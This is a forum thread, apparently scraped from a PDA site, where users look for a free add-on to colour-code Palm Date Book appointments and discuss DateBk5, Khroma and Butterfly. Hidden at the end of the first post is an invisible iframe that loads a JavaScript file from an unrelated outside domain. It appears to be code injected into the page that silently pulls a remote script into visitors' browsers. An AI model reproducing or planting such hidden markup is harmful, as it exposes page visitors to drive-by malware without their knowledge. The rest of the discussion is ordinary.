+ Reply to Thread

Thread: Date Book Color

Date Book Color

Is there any add-on to Date Book to incorporate color for appointments? Other than this Date Book works fine for my needs. DateBk5 looks incredible but has tons of features I don't need and I prefer not to spend $25 just to add color.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No good add-on apps for this?

I'd love to see something like this as well. If you do find one, please let us know!

At the moment, all I have is Khroma (freeware), which allows you to edit the colors of various things on the palm (menu text and backgrounds, status bars, screen backgrounds, etc.). It's not as cool as color-coded datebook entries, but at least it gets a little bit of color in and brightens things up. There's a configuration piece where you can specify the precise colors of everything, as well as a quick-change utility that allows you to switch to a either custom palette you saved, or one of the (sometimes rather scary!) pre-configured ones.

Have you tried: Butterfly?
    ~'kito
    pdaPhoneHome Moderator

Butterfly

It says it supports the 6035. How can it add color to a monochrome device?

I think that if it is all alone in the forest with no one around to see or hear it, then and only then it supports color.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I think that if it is all alone in the forest with no one around to see or hear it, then and only then it supports color.
    Just like if it falls from one of those trees in the forest with no one around, it doesn't really shatter to a thousand pieces
    Well, I guess it wouldn't shatter even if someone was around :p Trusty ol' smartphones.